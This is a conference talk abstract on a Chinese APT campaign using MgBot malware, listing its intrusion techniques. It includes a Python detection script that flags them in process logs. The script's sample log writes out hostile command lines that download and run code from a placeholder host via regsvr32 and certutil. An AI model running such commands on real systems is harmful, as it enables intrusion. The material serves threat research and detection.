A new Chinese APT ‘Evasive Panda’ group targets India and Hong Kong using a new variant of MgBot malware

Hossein Jazi (Malwarebytes) & Jérôme Segura (Malwarebytes)
Live only, 16:00 - 16:30 UTC, Wednesday 30 September 2020 (Day 1)
In July 2020 we observed an APT campaign that targeted India and Hong Kong using a new variant of the MgBot malware. In this campaign the actor relied on several advanced TTPs, including:
  • Squiblydoo: using the signed Microsoft binary regsvr32.exe to fetch a COM scriptlet directly from the Internet and execute it, bypassing application whitelisting.

  • UAC bypass through the CMSTPLUA COM interface.

  • File download using CertUtil.

  • Process injection through the Windows Application Management (AppMgmt) service.

  • Execution through module load, using a dropped copy of rundll32.exe to run the payloads.

Our research into this campaign led us to uncover a new Chinese APT group that we believe has been active since at least 2014. Based on the contents of the document used by this campaign, which are aligned with Chinese government interests, we believe it is likely that this actor is being sponsored by the government of China.

The group uses several initial-access techniques. We observed malicious documents weaponized with macros or DDE, as well as exploits for vulnerabilities in Microsoft Office (CVE-2012-0158) and the VBScript engine (CVE-2018-8174). The group develops its own malware, such as MgBot, and also uses commercial tooling such as Cobalt Strike. We have further identified an Android RAT called Ksremote that the group developed to target mobile users.
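The TTPs listed above and the Office-document initial access described in this paragraph all leave command-line-visible traces in process-creation telemetry. As an added example (not code from the talk or from Malwarebytes), the following Python triage script runs one rule per technique over a handful of constructed Sysmon-style records. The record format, field names, helper functions and sample command lines are this example's own assumptions; the CLSID is the documented CMSTPLUA COM class used by the UAC bypass. The AppMgmt injection step is not covered because it is not visible on a process-creation command line.

```python
"""Triage of process-creation telemetry for the LOLBin TTPs described above.

Added example, not code from the talk or from Malwarebytes. The records
below are constructed (Sysmon Event ID 1 fields flattened to one
'Key=Value|Key=Value' line each); the field names and helper functions
are this example's own conventions, not a real log format.
"""
import re
from dataclasses import dataclass
from typing import Callable, Dict, List, Tuple


@dataclass(frozen=True)
class ProcEvent:
    image: str    # full path of the created process
    cmdline: str  # its command line
    parent: str   # full path of the parent process


def parse_event(line: str) -> ProcEvent:
    """Parse one constructed 'Key=Value|Key=Value' record into a ProcEvent."""
    fields = dict(part.split("=", 1) for part in line.split("|"))
    return ProcEvent(fields["Image"], fields["CommandLine"], fields.get("ParentImage", ""))


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
# Documented CLSID of the CMSTPLUA COM class whose ICMLuaUtil interface is abused
# for the UAC bypass; the elevated COM server shows up as dllhost.exe /Processid:{CLSID}.
CMSTPLUA_CLSID = "{3e5fc7f9-9a51-4367-9063-a120244fbec7}"
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
LOLBINS = {"regsvr32.exe", "certutil.exe", "rundll32.exe", "mshta.exe", "cmd.exe", "powershell.exe"}


def is_squiblydoo(e: ProcEvent) -> bool:
    # regsvr32 fetching a scriptlet over HTTP(S) and running it through scrobj.dll
    cl = e.cmdline.lower()
    return (basename(e.image) == "regsvr32.exe" and "scrobj.dll" in cl
            and re.search(r"/i:\s*https?://", cl) is not None)


def is_certutil_download(e: ProcEvent) -> bool:
    # certutil -urlcache / -verifyctl with a URL is a download, not certificate work
    cl = e.cmdline.lower()
    return (basename(e.image) == "certutil.exe"
            and re.search(r"[-/](urlcache|verifyctl)\b", cl) is not None and "http" in cl)


def is_cmstplua_host(e: ProcEvent) -> bool:
    # Elevated COM surrogate for CMSTPLUA. Legitimate connection-manager setup can
    # also instantiate it, so in practice correlate with what this dllhost spawns.
    return basename(e.image) == "dllhost.exe" and CMSTPLUA_CLSID in e.cmdline.lower()


def is_rogue_rundll32(e: ProcEvent) -> bool:
    # rundll32.exe running from anywhere but the system directories is a dropped copy
    return basename(e.image) == "rundll32.exe" and not e.image.lower().startswith(SYSTEM_DIRS)


def is_office_spawning_lolbin(e: ProcEvent) -> bool:
    # Macro/DDE-weaponized documents show up as an Office application launching a LOLBin
    return basename(e.parent) in OFFICE_APPS and basename(e.image) in LOLBINS


RULES: Dict[str, Callable[[ProcEvent], bool]] = {
    "squiblydoo": is_squiblydoo,
    "certutil_download": is_certutil_download,
    "cmstplua_uac_bypass": is_cmstplua_host,
    "rogue_rundll32": is_rogue_rundll32,
    "office_spawns_lolbin": is_office_spawning_lolbin,
}


def triage(lines: List[str]) -> List[Tuple[int, str]]:
    """Return (record index, rule name) for every rule each record trips."""
    hits: List[Tuple[int, str]] = []
    for idx, line in enumerate(lines):
        event = parse_event(line)
        hits.extend((idx, name) for name, rule in RULES.items() if rule(event))
    return hits


# Constructed sample telemetry: four malicious records followed by two benign ones.
SAMPLE_LOG = [
    r"Image=C:\Windows\System32\regsvr32.exe|CommandLine=regsvr32.exe /s /n /u /i:http://203.0.113.10/a.sct scrobj.dll|ParentImage=C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
    r"Image=C:\Windows\System32\certutil.exe|CommandLine=certutil.exe -urlcache -split -f http://203.0.113.10/p.dat C:\Users\Public\p.dat|ParentImage=C:\Windows\System32\cmd.exe",
    r"Image=C:\Windows\System32\dllhost.exe|CommandLine=C:\Windows\System32\dllhost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}|ParentImage=C:\Windows\System32\svchost.exe",
    r"Image=C:\ProgramData\Intel\rundll32.exe|CommandLine=rundll32.exe C:\ProgramData\Intel\core.dll,Start|ParentImage=C:\Windows\System32\svchost.exe",
    r"Image=C:\Windows\System32\rundll32.exe|CommandLine=rundll32.exe shell32.dll,Control_RunDLL|ParentImage=C:\Windows\explorer.exe",
    r"Image=C:\Windows\System32\regsvr32.exe|CommandLine=regsvr32.exe /s C:\Program Files\Vendor\plugin.dll|ParentImage=C:\Program Files\Vendor\setup.exe",
]

if __name__ == "__main__":
    for idx, name in triage(SAMPLE_LOG):
        print(f"record {idx}: {name}")
```

The first record trips two rules at once (Squiblydoo and Office-spawned LOLBin), which is the kind of overlap worth scoring higher than either signal alone; the last two records are ordinary rundll32 and regsvr32 usage and trip nothing. The CMSTPLUA rule is deliberately the weakest: on its own it only says the elevated COM server was instantiated, and the actionable signal is a child of that dllhost.exe that a connection-manager task would never spawn.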

In this talk we will provide more details about the activities of this APT group, including its campaigns, toolsets, TTPs and the infrastructure used by this actor.
Hossein Jazi (Malwarebytes)
Hossein Jazi is Senior Threat Intelligence Analyst at Malwarebytes. He is an active researcher whose interests include APT tracking, malware analysis and cyber threat intelligence. His current focus is tracking APT campaigns and developing machine-learning-based models to attribute threat actors. He has specialized in cybersecurity and APT analysis for over 10 years.
Jérôme Segura (Malwarebytes)
Jérôme Segura is Director of Threat Intelligence at Malwarebytes. His passion is identifying new infection vectors or schemes and taking them apart in technical yet accessible blog posts. Over the years he has worked with law enforcement and industry partners to report and take down scams, malvertising and other web threats.